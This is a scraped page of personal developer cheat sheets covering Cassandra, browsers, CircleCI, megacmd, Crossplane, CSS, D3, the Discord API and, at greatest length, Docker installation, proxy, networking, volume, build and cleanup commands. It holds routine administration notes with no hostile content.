CLI tool to work with any JDBC driver ( Java SQl SH )

Blockchain, Ledger assets (Bitcoin)

solutions

Corda is an open-source platform for the development and deployment of distributed multi-party applications.

education links

bitcoin theory

PyBitMessage/src/bitmessagemain.py

other

Apache Cassandra cheat sheet

  • one of the BASE ( Basically Available, Soft state, Eventually consistent ) storages
  • using CassandraQueryLanguage for querying data
  • no master, managed by background daemon process

levels of data

  • KeySpace
  • ColumnFamily
  • Column
  • Key

Columns

 FamilyColumn <>---------- Column

SuperFamilyColumn <>----- SuperColumn CompositeColumn

Reading modes:

  • one: from first node
  • quorum: when more than 50% of nodes responded
  • all ( consistent ): when all nodes answered

Writing modes:

  • zero: no wait, just send data and close connection by client
  • any: at least one node should answer
  • one: node answered, commit log was written, new value placed in memory
  • quorum: more than 50% confirmed
  • all: all nodes confirmed writing

google chrome cheat sheet

how to install

x-www-browser https://www.google.com/chrome/thank-you.html?brand=CHBD&statcb=0&installdataindex=empty&defaultbrowser=0
# remove chrome cache: 
rm -rf ~/.cache/google-chrome
rm -rf ~/.config/google-chrome
sudo dpkg -i ~/Downloads/google-chrome-stable_current_amd64.deb

internal links

firefox system links about:about

  • system settings
  • applications
  • extensions

extensions folder

# chrome
cd $HOME/.config/google-chrome/Default/Extensions/
# chromium
cd $HOME/snap/chromium/common/chromium/Default/Extensions/

find names of all installed extensions with path to them

EXT_PATH=$HOME/snap/chromium/common/chromium/Default/Extensions/
for each_file in `find $EXT_PATH -name "manifest.json"`; do
    echo $each_file
    cat $each_file | grep '"name": '
done

alternative way of finding names of all installed plugins/extensions

CHROME_CONFIG=$HOME/.config/google-chrome
IFS=$'\n'
for each_file in `find $CHROME_CONFIG | grep manifest.json$`; do
    echo $each_file
    cat $each_file | grep '"name": '
done

application

## folder
ll "$HOME/snap/chromium/common/chromium/Default/Web Applications/Manifest Resources/"

## start application
/snap/bin/chromium --profile-directory=Default --app-id=cifhbcnohmdccbgoicgdjpfamggdegmo

link anchor, link to text, highlight text on the page, find text on the page, text fragments

x-www-browser https://github.com/cherkavi/cheat-sheet/blob/master/architecture-cheat-sheet.md#:~:text=Architecture cheat sheet&text=Useful links

# also possible to say prefix before the text
x-www-browser https://github.com/cherkavi/cheat-sheet/blob/master/architecture-cheat-sheet.md#:~:text=Postponing,%20about

# also possible to set a prefix and suffix around the destination text

firefox

prevent to open in private mode

sudo mkdir -p /etc/firefox/policies
echo '
{
  "policies": {
    "DisablePrivateBrowsing": true
  }
}
' >> /etc/firefox/policies/policies.json

circle-ci

setup

  • token
  • visual code extension: circleci.circleci
  • install cli
    sudo snap install circleci
    circleci setup
    # update your ~/.bashrc
    eval "$(circleci completion bash)"
    export CIRCLECI_CLI_HOST=https://circleci.com
    
    circleci setup

working loop

setup new project

  1. create repository in github/gitlab
  2. create file .circleci/config.yml in repository
# CircleCI configuration file
version: 2.1

jobs:
  # first job
  print_hello:
    docker:
      - image: cimg/base:2022.05
    steps:
      - run: echo "--- 1.step"
      - run: echo "hello"
      - run: echo "----------"

  # second job
  print_world:
    docker:
     - image: cimg/base:2022.05
    steps:
      - run: 
          name: print world
          command: | 
            echo "--- 2.step"
            echo "world"
            echo "----------"
 
workflows:
  # Name of workflow
  my_workflow_1:
    jobs:
      - print_hello
      - print_world:
          requires: 
            - print_hello
circleci validate
  3. connect circleci to project

webhook will be created in the project

try catch job

try catch on job level

jobs:
    job_name:
        docker:
            - image: cimg/base:2022.05
        steps:
            - run: echo "hello"
            - run: 
                name: error simulation
                command: |  
                    return 1
            - run:
                name: catch possible previous errors
                command: |
                    echo "time to execute rollback operation"
                when: on_fail

other possible conditions:

when:
    environment:
        MY_VAR: "true"
when:
    # of previous step
    status: success
when:
    branch:
        only:
            - master
            - develop
when: |
    steps.branch.matches('feature/*') || steps.branch.matches('bugfix/*')

try catch on command level

jobs:
    job_name:
        docker:
            - image: cimg/base:2022.05
        steps:
            - run: 
                name: error simulation
                command: |  
                    return 1
                on_fail:
                    - run:
                        name: catch exception
                        command: |
                            echo " time to execute rollback operation"

job examples

job cloudformation

  run_cloudformation: 
    docker:
      - image: amazon/aws-cli
    steps:
      - checkout
      - run:
          name: run cloudformation
          command: |
            aws cloudformation deploy \
              --template-file my-template-file.yml \
              --stack-name my-template-file-${CIRCLE_WORKFLOW_ID:0:5} \
              --region us-east-1
jobs:
    job_name:
        docker: 
        - image: cimg/base:2022.05
        environment:
            CUSTOM_MESSAGE: "<< pipeline.project.git_url >> :: << pipeline.trigger_parameters.gitlab.commit_message>>"
        steps:
        - run: echo "$CUSTOM_MESSAGE"
version: 2.1

parameters:
  my_custom_parameter_1:
    type: string
    default: "~/"

jobs:
    job_name:
        docker: 
        - image: cimg/base:2022.05
        environment:
            CUSTOM_MESSAGE: "<< pipeline.parameters.my_custom_parameter_1 >>"

job with parameters

jobs:
  my_job_1:
    parameters:
      my_custom_parameter_1:
        type: string
        default: my_org
    docker:
      - image: cimg/base:2020.01
    steps:
      - run: echo "  << parameters.my_custom_parameter_1 >>  "

workflows:
  my_workflow_1:
    jobs:
      - my_job_1:
          my_custom_parameter_1: my_organization          
      - my_job_1:
          my_custom_parameter_1: another organization

environment variables can be set in: Project Settings -> Environment Variables
all env variables will be hidden as secrets ( no output in console will be visible )

triggering pipeline

  • webhook
    • new commit in branch
    • pull/merge request
  • api
    • command-line tool
    • chat message
  • schedule
  • other pipeline

jobs communication

cache ( folders & files )

TTL - only during the run of the pipeline; immutable after creation

# https://circleci.com/docs/configuration-reference/#savecache
- save_cache:
    key: |
      maven_repo-{{ .Branch }}-{{ .Revision }} 
      result_of_build-{{ .Branch }}-{{ .Revision }}
    paths:
      - ~/.m2
      - target/application-with-dependencies.jar
# https://circleci.com/docs/configuration-reference/#restorecache
- restore_cache:
    keys:
      - maven_repo-{{ .Branch }}-{{ .Revision }} 
      - result_of_build-{{ .Branch }}-{{ .Revision }}

workspace

mutable

# https://circleci.com/docs/configuration-reference/#persisttoworkspace
- persist_to_workspace:
    root: /tmp/my_folder_1
    path:
      - target/application.jar
      - src/config/settings.properties
# https://circleci.com/docs/configuration-reference/#attachworkspace
- attach_workspace:
    at: /tmp/my_folder_1

secret keeper

job manual approval

      - hold: 
          type: approval # "On Hold"

Local usage

how to execute job

JOB_NAME=job_echo
circleci local execute --job $JOB_NAME

megacmd ( mega.nz )

installation

# example for Ubuntu
wget https://mega.nz/linux/repo/xUbuntu_24.04/amd64/megacmd-xUbuntu_24.04_amd64.deb && sudo apt install "$PWD/megacmd-xUbuntu_24.04_amd64.deb"

login

mega-login $MEGA_USER $MEGA_PASS

check login

mega-whoami
mega-df
mega-du

mega interactive mode

mega-cmd

get file

mega-ls
# mega-tree

# copy name of one of the file 
mega-get FILENAME

Crossplane

  • Kubernetes extension for managing K8S and non-K8S resources via providers, watching their state ( installation sketch below ).
  • Similar to Terraform and Pulumi ( and can manage them )
  • CLI interface
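
typical installation via the upstream helm chart; a sketch based on the public chart location, check the current Crossplane docs for the exact version

helm repo add crossplane-stable https://charts.crossplane.io/stable
helm repo update
helm install crossplane crossplane-stable/crossplane --namespace crossplane-system --create-namespace
# verify
kubectl get pods -n crossplane-system
kubectl get providers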

Namespace

namespace: crossplane-system
kind: managed resource

deployments

> kubectl get deployments -n crossplane-system
NAME                      READY   UP-TO-DATE   AVAILABLE 
crossplane                1/1     1            1         
crossplane-rbac-manager   1/1     1            1         

Resources

flowchart LR 

c[crossplane] ---o k[k8s]
c <-.->|r/w| e[etcd]

p[providers] --o c

p --> cr[composition
         resource]  --> m[managed 
                          resource]

p --> cm[composition] --> cr


resolve issues

  • resource map
  • logs

Links

CSS cheat sheet

links

Units

  • Absolute: mm, in, px(1/96 inch)
  • Relative: em (parEnt), rem (Root), vh/vw (ViewHeight/ViewWidth), vp (ViewPort)

position on the screen: static, relative, absolute, fixed, sticky

position inside own space or parent element or screen position

visibility

  • visible
  • hidden - render it, but with empty place
  • inherit

display

display among other elements or/and in the line

  • inline

    [element][element] min height & width - no control

  • block

    [ ......element....... ] fill the whole row on the screen height & width

  • inline-block

    [element] with height & width

  • flex

    [element][element][element]

  • table

    [element][element][element] with predefined height

  • grid

    [element]\n [element]\n

  • none

    no element in layout, no dedicated place

inline, inline-block, block

inline, inline-block, block

display: flex

display flex

display: grid

display grid

D3 cheat sheet

alternatives

Examples

logging

      function log(sel,msg) {
         console.log(msg,sel);
      }


    svg
      .append("text")
      .attr("x", 0)
      .attr("y", -20)
      .attr("class", "svg_diagram_title")
      .text(title)
      .call(log,title)
      ;

Issues

diagram not showing

if you don't see any images - check your selector, 
D3 will not complain about 'target element not found '!!!!

SOLUTION: fast and small example

<html lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <script src="d3.v5.js"></script>
</head>
<body>
  <svg id="dataviz_area" height=200 width=450></svg>
  <script>
    // MUST BE DECLARED AFTER TARGET ELEMENT DECLARATION
    d3.select("#dataviz_area").append("div").html("hello")
  </script>
</body>
</html>

Discord cheat sheet

create link to your profile

  1. copy UserId from your profile ( avatar in left bottom corner )

    maybe need to activate "Development Mode" settings -> Advanced: developer mode - on

  2. insert your DISCORD_USER_ID at the end of the link: https://discord.com/users/$DISCORD_USER_ID

Obtain BOT Token

  1. https://discord.com/developers/applications
  2. new application
  3. bot
  4. add bot
  5. reset your token
  6. save your token in environment variable DISCORD_BOT_TOKEN

add bot to your channel

not possible to read direct messages

read your messages from channel

DISCORD_CHANNEL_ID=my_channel_id
curl -H "Authorization: Bot $DISCORD_BOT_TOKEN" "https://discord.com/api/v10/channels/${DISCORD_CHANNEL_ID}/messages?limit=10"

Docker cheat sheet

links

Ecosystem

  • Docker Daemon
  • Docker Volume - store persist data
  • Docker Client - CLI, gui analogue ( Kitematic )
  • Docker Compose - Python app over Docker Daemon
  • Docker Swarm
  • Docker HUB
  • Docker Cloud

installation ( Debian )

docker desktop

sudo apt install docker.io
# start daemon on Debian
sudo systemctl start docker
sudo systemctl enable docker
#!/bin/bash
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-get install -y docker-ce

usermod -aG docker ubuntu
docker run -p 8080:8080 tomcat:8.0

docker manager

bash completion

curl -o ~/.docker-machine.bash  https://raw.githubusercontent.com/docker/machine/master/contrib/completion/bash/docker-machine.bash 

update your bashrc

. ~/.docker-machine.bash

Architecture

architecture

Tools

information about docker itself

docker info
docker system info

settings files

/etc/docker/daemon.json
/etc/default/docker 
~/.docker/config.json
/etc/systemd/system/docker.service.d/http-proxy.conf

how to skip typing "sudo" each time, without sudo

# new group in sudo for docker
sudo groupadd docker
# add current user into docker group
sudo usermod -aG docker $USER 

# restart service
sudo service docker restart
# restart daemon
systemctl daemon-reload
# refresh sudo 
sudo reboot

Docker Issue:

Couldn't connect to Docker daemon at http+docker://localhost - is it running?
sudo usermod -a -G docker $USER
sudo systemctl enable docker # Auto-start on boot
sudo systemctl start docker # Start right now
# reboot

Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock

logout and login again


standard_init_linux.go:228: exec user process caused: exec format error
WORKDIR /opt/airflow
ENTRYPOINT ["./entrypoint.sh"]

this error usually means a missing shebang, a wrong target architecture, or Windows CR LF line endings - check that entrypoint.sh uses UNIX (LF) line endings

proxy set up:

proxy for daemon

  • /etc/systemd/system/docker.service.d/10_docker_proxy.conf
[Service]
Environment=HTTP_PROXY=http://1.1.1.1:111
Environment=HTTPS_PROXY=http://1.1.1.1:111

or

[Service]    
Environment="HTTP_PROXY=http://webproxy.host.de:3128/" "NO_PROXY=localhost,127.0.0.1,.host.de,.viola.local,.local"
sudo shutdown -r now
  • /etc/sysconfig/docker
HTTP_PROXY="http://user01:[email protected]:8080"
HTTPS_PROXY="https://user01:[email protected]:8080"

proxy for docker client to pass proxy to containers

  • ~/.docker/config.json
{
 "proxies":
 {
   "default":
   {
     "httpProxy": "http://127.0.0.1:3001",
     "noProxy": "*.test.example.com,.example2.com"
   }
 }
}
# restart docker with daemon
sudo systemctl daemon-reload && sudo systemctl restart docker
# or
sudo systemctl restart docker.service
# or 
sudo service docker restart
  • docker run --env-file environment.file {image name}

( or via -e variables )

HTTP_PROXY=http://webproxy.host:3128
http_proxy=http://webproxy.host:3128
HTTPS_PROXY=http://webproxy.host:3128
https_proxy=http://webproxy.host:3128
NO_PROXY="localhost,127.0.0.1,.host.de,.viola.local"
no_proxy="localhost,127.0.0.1,.host.de,.viola.local"
  • /etc/default/docker
export http_proxy="http://host:3128/"
  • if none of the previous options works ( e.g. due to permissions ) or you need network access during the build ( apt install, wget, curl, ... ):
    • build arguments
    sudo docker build \
    --build-arg rsync_proxy=http://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --build-arg https_proxy=https://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --build-arg http_proxy=http://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --build-arg no_proxy=localhost,127.0.0.1,.localdomain,.ubsroup.net,.ubs.corp,.cn.sub,.muc,.vantage.org \
    --build-arg ftp_proxy=http://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --file Dockerfile-firefox .
    • change Docker file with additional lines ( not necessary, only for earlier docker version )
    ARG rsync_proxy
    ENV rsync_proxy $rsync_proxy
    ARG http_proxy
    ENV http_proxy $http_proxy
    ARG no_proxy
    ENV no_proxy $no_proxy
    ARG ftp_proxy
    ENV ftp_proxy $ftp_proxy
    ...
    # at the end of file
    unset http_proxy
    unset ftp_proxy
    unset rsync_proxy
    unset no_proxy

login, logout

docker login -u cherkavi -p `oc whoami -t` docker-registry.local.org
docker logout docker-registry.local.org
# for artifactory you can use token as password

check login

cat ~/.docker/config.json | grep "auth\":" | awk -F '"' '{print $4}' | base64 -d -

check login without access to config

echo "" | docker login docker-registry.local.org
echo $?

issue

...
6c01b5a53aac: Waiting 
2c6ac8e5063e: Waiting 
cc967c529ced: Waiting 
unauthorized: authentication required

solution

rm -rf ~/.docker/config.json
# or just remove one record inside "auths" block with your url-repo
docker logout url-repo

restart Docker service

sudo systemctl daemon-reload
sudo systemctl restart docker
sudo systemctl show docker
# restart docker
sudo systemctl restart docker.service

Images

search image into registry, find image, catalog search

docker search <text of search>

inspect image in repository inspect layers analyse image show layers image xray

## skopeo
# sudo apt-get -y install skopeo
# or: https://ftp.de.debian.org/debian/pool/main/s/skopeo/
skopeo inspect docker://registry.fedoraproject.org/fedora:latest
# show all executed command lines list of commands in docker container 
skopeo inspect --config docker://registry.fedoraproject.org/fedora:latest | grep -e "CMD" -e "ENTRYPOINT"

## dive
# https://github.com/wagoodman/dive
dive ${DOCKER_REGISTRY}/portal-production/jenkins-builder

## [docker scout](https://docs.docker.com/scout/)
export PATH=$HOME/.docker/cli-plugins:$PATH
source <(docker-scout completion bash)

export layers tag layers

docker save imagename build-layer1 build-layer2 build-layer3 > image-caching.tar
docker load -i image-caching.tar

export layers to filesystem

# https://github.com/larsks/undocker/
docker save busybox | undocker -vi -o busybox -l 

pull image from repository

docker pull <image name>
docker pull cc-artifactory.myserver.net/some-path/<image name>:<image version>

image can be found: https://hub.docker.com/ example of command: docker pull mysql

push image to repository

docker push cc-artifactory.myserver.net/some-path/<image name>:<image version>

copy images between registries

skopeo copy docker://quay.io/buildah/stable docker://registry.internal.company.com/buildah

show all local images

docker images --all
docker image list --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}\t{{.Size}}"
docker image list --format "{{.ID}}\t{{.Repository}}"

Run and Start


docker run -d --restart=unless-stopped {CONTAINER ID}
# docker update --restart=no {CONTAINER ID}
| value | description |
| --- | --- |
| no | Do not automatically restart the container ( the default ) |
| on-failure | Restart the container if it exits due to an error, which manifests as a non-zero exit code |
| always | Always restart the container if it stops. If it is manually stopped, it is restarted only when the Docker daemon restarts or the container itself is manually restarted ( see the second bullet listed in restart policy details ) |
| unless-stopped | Similar to always, except that when the container is stopped ( manually or otherwise ), it is not restarted even after the Docker daemon restarts |
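
restart policy usage example

# retry at most 5 times if the container exits with a non-zero code
docker run -d --restart=on-failure:5 nginx
# change the policy of an already running container
docker update --restart=unless-stopped {CONTAINER ID}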

map volume ( map folder )

-v {host machine folder}:{internal folder into docker container}:{permission}
-v `pwd`:/home/root/host_folder:rw
-v $PWD:/home/root/host_folder:Z
-v /tmp:/home/root/tmp
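
a combined example ( host paths are illustrative )

docker run --rm \
  -v `pwd`/config:/app/config:ro \
  -v /tmp/app-cache:/app/cache:rw \
  -v `pwd`/data:/app/data:Z \
  ubuntu:18.04 ls -la /app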

check volumes

docker volume ls

map multiply ports to current host

-p {host machine port}:{internal docker machine port}
docker run -d -p 8030-8033:8030-8033/tcp  e02d9b40e89d
docker run -d -p 8040:8040/tcp  prom/prometheus 

run container in detached ( background ) mode, without console attachment to running process

  • --detach
  • -d=true
  • -d

run image with specific name

docker run --name my_specific_name {name of image}

run image with specific user ( when you have issue with rights for mounting external folders )

docker run --user root {name of image}

run image with current user ( when you use docker image as pre-installed software )

docker run --user $(id -u):$(id -g) {name of the image}

run container with empty entrypoint, without entrypoint

ENTRYPOINT []
docker run --entrypoint="" --interactive --tty image-name /bin/sh 

start stopped previously container

docker start {CONTAINER ID}

Connect containers

connecting containers via host port, host connection

# external data storage for Redis: --volume /docker/host/dir:/data
sudo docker run --publish 7001:6379 --detach redis
# ip a | grep docker -B 2 | grep inet | grep global
sudo docker run --interactive --tty redis redis-cli -h 172.17.0.1 -p 7001

connecting containers directly via link

sudo docker run --name my-redis-container --detach redis
sudo docker run --interactive --tty --name my-redis-cli --link my-redis-container:redis redis redis-cli -h redis -p 6379

connecting containers via network

docker network create some-network

docker run --network some-network --name my-redis -d redis
docker run --network some-network --interactive --tty redis redis-cli -h my-redis

share network for docker-compose

docker network create --driver bridge my-local
docker network inspect my-local
docker network rm my-local
version: '3'
services:
    ...

networks:
    default:
        external:
            name: my-local

host address

172.17.0.1

or with .bashrc: export DOCKER_GATEWAY_HOST=172.17.0.1

# docker-compose.yml
version: '3.7'

services:
  app:
    image: your-app:latest
    ports:
      - "8080:8080"
    environment:
      DB_UPSTREAM: http://${DOCKER_GATEWAY_HOST:-host.docker.internal}:3000

connecting containers via host, localhost connection, shares the host network stack and has access to the /etc/hosts for network communication, host as network share host network share localhost network

docker run --rm   --name postgres-docker -e POSTGRES_PASSWORD=docker -d -p 5432:5432 postgres
# --net=host 
# --network host 
docker run -it --rm --network="host" postgres psql -h 0.0.0.0 -U postgres

assign static hostname to container (map hostname)

  • create network
docker network create --subnet=172.18.0.0/16 docker.local.network
  • assign address with network
docker run --net docker.local.network --ip 172.18.0.100 --hostname hadoop-local --network-alias hadoop-docker -it {CONTAINER ID} /bin/bash
  • check network
docker inspect {CONTAINER ID} | grep -i NETWORK

network types

--network="bridge" : 
  'host': use the Docker host network stack
  'bridge': create a network stack on the default Docker bridge
  'none': no networking
  'container:<name|id>': reuse another container's network stack
  '<network-name>|<network-id>': connect to a user-defined network
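
example of reusing another container's network stack ( container and image names are illustrative )

docker run -d --name web nginx
# 'localhost' below resolves inside the network namespace of the 'web' container
docker run --rm --network=container:web curlimages/curl -s -o /dev/null -w "%{http_code}\n" http://localhost:80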

mount folder, map folder, mount directory, map directory multiple directories

working_dir="/path/to/working/folder"
docker run --volume $working_dir:/work -p 6900-6910:5900-5910 --name my_own_container -it ubuntu:18.04 /bin/sh
# !!! path to the host folder should be absolute !!! attach current folder 
docker run --entrypoint="" --name airflow_custom_local --interactive --tty --publish 8080:8080 --volume `pwd`/logs:/opt/airflow/logs --volume `pwd`/dags:/opt/airflow/dags airflow_custom /bin/sh 

Volumes

create volume

docker volume create {volume name}

inspect volume, check volume, read data from volume, inspect data locally

docker volume inspect {volume name}
[
    {
        "CreatedAt": "2020-03-12T22:07:53+01:00",
        "Driver": "local",
        "Labels": null,
        "Mountpoint": "/var/snap/docker/common/var-lib-docker/volumes/cd72b76daf3c66de443c05dfde77090d5e5499e0f2a0024f9ae9246177b1b86e/_data",
        "Name": "cd72b76daf3c66de443c05dfde77090d5e5499e0f2a0024f9ae9246177b1b86e",
        "Options": null,
        "Scope": "local"
    }
]
# inspect Mountpoint
ls -la /var/snap/docker/common/var-lib-docker/volumes/cd72b76daf3c66de443c05dfde77090d5e5499e0f2a0024f9ae9246177b1b86e/_data

list of all volumes

docker volume ls

using volume

docker run -v {volume name}:/folder/inside/container {name of image}
docker run --mount source={volume name},target=/folder/inside/container {name of image}
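
example with a named volume ( postgres keeps its data under /var/lib/postgresql/data )

docker volume create pgdata
docker run -d --name pg -e POSTGRES_PASSWORD=secret -v pgdata:/var/lib/postgresql/data postgres
# the named volume survives container removal
docker rm -f pg && docker volume inspect pgdata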

Inspection

show all containers that are running

docker ps

show all containers ( running, stopped, paused )

docker ps -a

show container with filter, show container with format

# filter docker images by name 
# output format - names with commands (https://github.com/BrianBland/docker/edit/master/api/client/formatter/formatter.go)
docker ps -a --filter "name=redis-lab" --format "{{.Names}} {{.Command}}"
docker ps -a --format "  {{.ID}} {{.Names}}"

join to executed container, connect to container, rsh, sh on container

docker attach {CONTAINER ID}
# docker exec --interactive --tty {CONTAINER ID} /bin/sh

with detached sequence

docker attach {CONTAINER ID} --detach-keys="ctrl-z"

with translation of all signals ( detaching: ctrl-p & ctrl-q )

docker attach {CONTAINER ID} --sig-proxy=true

docker log of container, console output

docker logs --follow --tail all {CONTAINER ID}
docker logs --follow --tail 25 {CONTAINER ID}
docker logs {CONTAINER ID}
docker logs --since 10m {CONTAINER ID}
docker logs --since 2018-01-01T00:00:00 {CONTAINER ID}

show processes from container

docker top {CONTAINER ID}

# https://github.com/bcicen/ctop
# sudo apt-get install docker-ctop
ctop

run program inside container and attach to process

docker exec -it {CONTAINER ID} /bin/bash

show difference with original image

docker diff {CONTAINER ID}

show all layers command+size, reverse engineering of container, print dockerfile

docker history --no-trunc {CONTAINER ID}
docker image history --no-trunc {CONTAINER ID}

docker running image information

docker inspect
docker image inspect
docker inspect -f '{{.HostConfig.PortBindings}}' {CONTAINER ID}
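
more format examples ( Go templates over the inspect output )

# container IP address
docker inspect -f '{{.NetworkSettings.IPAddress}}' {CONTAINER ID}
# mounted volumes
docker inspect -f '{{range .Mounts}}{{.Source}} -> {{.Destination}}{{println}}{{end}}' {CONTAINER ID}
# environment variables baked into the image
docker image inspect -f '{{.Config.Env}}' {IMAGE ID}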

debug information

docker --debug

or for file /etc/docker/daemon.json

{
  "debug": true
}

copy files between host and container

docker cp <src> <container>:<dest>
docker cp <container>:<src> <dest>

save


docker save changed container commit changes fix container changes

docker run --entrypoint="" -it {IMAGE_ID} /bin/sh
# execute some commands like `apt install curl`....

make a changes and keep it running select another terminal window

docker ps
# select proper container_id 
docker commit {CONTAINER_ID} {NEW_IMAGE_NAME}

!!! be aware: if you skipped the entrypoint, the committed image will have no entrypoint either

container new name, rename container, container new tag

# change name of container
docker tag {IMAGE_ID} <TAG_NAME[:TAG VERSION]>
docker tag {TAG_1} {TAG_2}
# untag
docker rmi {TAG_NAME}

docker save - image with layers and history

docker save --output <output file name>.tar {CONTAINER ID}

docker export - container WITHOUT history, without layers

docker export --output <output file name>.tar {CONTAINER ID}

Load/Import/Read from file to image


load full image into 'images' - with all layers and history

docker load -i {filename of archive}

import full image into 'images' - like a basement

docker import {filename of archive}
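
save/load keeps layers and history, export/import flattens them; a quick round trip

docker export {CONTAINER ID} | docker import - myimage:flat
# the flattened image keeps only a single filesystem layer
docker image history myimage:flat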

Stop and Pause


wait until container will be stopped

docker wait {CONTAINER ID}

stop executing container

docker stop {CONTAINER ID}

stop restarted container, compose stop, stop autostart, stop restarting

docker update --restart=no {CONTAINER ID}
# send signal SIGTERM
docker stop {CONTAINER ID}

pause/unpause executing container

docker pause {CONTAINER ID}
docker unpause {CONTAINER ID}

kill executing container

# send signal SIGKILL
docker kill {CONTAINER ID}
# send signal to container
docker kill --signal=9 {CONTAINER ID}

leave executing container

just kill the terminal

Remove and Clean, docker cleanup


remove all containers

docker rm $(docker ps -a -q)

remove image

docker rmi <IMAGE ID>
docker rmi --force <IMAGE ID>
# remove unused images
sudo docker rmi `sudo docker images | grep "<none>" | awk '{print $3}'`

remove volumes ( unused )

docker volume ls -qf dangling=true | xargs -r docker volume rm

cleanup docker

docker system prune -af --volumes
# clean only unused volumes
docker system prune -f --volumes

delete

docker network ls  
docker network ls | grep "bridge"   
docker network rm $(docker network ls | grep "bridge" | awk '/ / { print $1 }')

delete docker, remove docker, uninstall docker

sudo docker network ls

sudo apt remove docker.io
sudo rm -rf /etc/systemd/system/docker.service
sudo rm -rf /etc/systemd/system/docker.socket
rm /home/$USER/.docker/.buildNodeID
sudo rm -rf /var/lib/docker

Additional management

docker events real time

docker system events

disk usage information

docker system df

remove unused data, remove stopped containers

docker system prune

portainer - web gui for docker

docker pull portainer/portainer
docker run -d -p 9000:9000 -v /var/run/docker.sock:/var/run/docker.sock portainer/portainer

login/pass: admin/12345678

installation issues

The following packages have unmet dependencies:
 docker-ce : Depends: libseccomp2 (>= 2.3.0) but 2.2.3-3ubuntu3 is to be installed
E: Unable to correct problems, you have held broken packages.

resolution:

sudo apt install docker-ce=17.03.0~ce-0~ubuntu-xenial

Error starting daemon: error initializing graphdriver: /var/lib/docker contains several valid graphdrivers: overlay2, aufs; Please cleanup or explicitly choose storage driver (-s <DRIVER>)
Failed to start Docker Application Container Engine.

resolution

sudo apt-get install linux-image-extra-$(uname -r) linux-image-extra-virtual
sudo modprobe aufs
sudo gedit /lib/systemd/system/docker.service &
ExecStart=/usr/bin/dockerd -H fd:// --storage-driver=aufs

possible issue with 'pull'

Error response from daemon: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.io on 160.55.52.52:8080: no such host

build error

W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/xenial/InRelease  Could not resolve 'archive.ubuntu.com'
W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/xenial-updates/InRelease  Could not resolve 'archive.ubuntu.com'

need to add proxy into Dockerfile

ENV http_proxy http://user:[email protected]:8080
ENV https_proxy http://user:[email protected]:8080

Build

  • docker cache: docker build --no-cache
  • docker base image: FROM ...
  • docker ignore files - ignore files from build process: .dockerignore
  • docker build time argument docker build --build-arg KEY=VALUE
  • docker runtime variables docker run --env KEY=VALUE

build from file

docker build -t {name of my own image}:latest {name of docker file | . } --no-cache
docker build -t solr-4.10.3:latest . // Dockerfile into current folder
docker build --tag java-app-runner:latest --build-arg http_proxy=http://user:[email protected]:8080  --file /home/projects/current-task/mapr/Dockerfile .

build with parameters, build with proxy settings

docker build --build-arg app_name=k8s-ambassador .
docker build --build-arg http_proxy=proxy.muc:8080 --build-arg https_proxy=proxy.muc:8080 .

build with parameters inside dockerfile

ARG app_name
ENV JAR=$app_name.jar
# bash command
# docker build --tag rviz-image --build-arg ROS_VERSION=latest .
# 
ARG ROS_VERSION
FROM cc-artifactory.ubsgroup.com/docker/ros:${ROS_VERSION}

dockerfile with pre-build two FROM section

# Build node app
FROM node:16 as build
WORKDIR /src
# sources must be copied in before installing/building
COPY . .
RUN yarn install --immutable
RUN yarn run web:build:prod

# start file service
FROM caddy:2.5.2-alpine
WORKDIR /src
COPY --from=build /src/web/.webpack ./
EXPOSE 80
CMD ["caddy", "file-server", "--listen", ":80"]

build useful commands

| command | description |
| --- | --- |
| FROM | Sets the base image, the starting image to build the container; must be the first line |
| MAINTAINER | Sets the author field of the generated images |
| RUN | Execute commands in a new layer on top of the current image and commit the results |
| CMD | Allowed only once ( if many then the last one takes effect ) |
| LABEL | Adds metadata to an image |
| EXPOSE | Informs the container runtime that the container listens on the specified network ports at runtime |
| ENV | Sets an environment variable |
| ADD | Copy new files, directories, or remote file URLs into the filesystem of the container |
| COPY | Copy new files or directories into the filesystem of the container |
| ENTRYPOINT | Allows you to configure a container that will run as an executable |
| VOLUME | Creates a mount point and marks it as holding externally mounted volumes from the native host or other containers |
| USER | Sets the username or UID to use when running the image |
| WORKDIR | Sets the working directory for any RUN, CMD, ENTRYPOINT, COPY, ADD commands |
| ARG | Defines a variable that users can pass at build-time to the builder using --build-arg |
| ONBUILD | Adds an instruction to be executed later, when the image is used as the base for another build |
| STOPSIGNAL | Sets the system call signal that will be sent to the container to exit |

  • Use RUN instructions to build your image by adding layers
  • Use ENTRYPOINT when building an executable Docker image and you need a command that is always executed ( ENTRYPOINT can still be overridden from the command line: docker run -d -p 80:80 --entrypoint /bin/sh alpine )
  • Use CMD to provide default arguments that can be overwritten from the command line when the container runs
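
a minimal sketch showing the interplay ( image and file names are arbitrary )

echo 'FROM alpine
ENTRYPOINT ["echo"]
CMD ["default argument"]' > Dockerfile-echo

docker build -t echo-demo -f Dockerfile-echo .
docker run --rm echo-demo                          # prints: default argument
docker run --rm echo-demo "overridden argument"    # CMD is replaced, ENTRYPOINT stays
docker run --rm --entrypoint /bin/ls echo-demo /   # ENTRYPOINT replaced from the command line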

push your container

  • docker login
  • docker tag <image> <registry>/<repository> ; also possible notation: <registry>/<repository>:<tag>
  • docker push <registry>/<repository>
DOCKER_REGISTRY="default-image-registry.apps.vantage.org"
IMAGE_LOCAL="ab1023fb0ac8"
OC_PROJECT="stg-1"
DOCKER_IMAGE_LOCAL_REPO=local
DOCKER_IMAGE_LOCAL_TAG=drill_connector

sudo docker tag $IMAGE_LOCAL $DOCKER_REGISTRY/$OC_PROJECT/$DOCKER_IMAGE_LOCAL_REPO:$DOCKER_IMAGE_LOCAL_TAG
sudo docker push $DOCKER_REGISTRY/$OC_PROJECT/$DOCKER_IMAGE_LOCAL_REPO:$DOCKER_IMAGE_LOCAL_TAG

advices

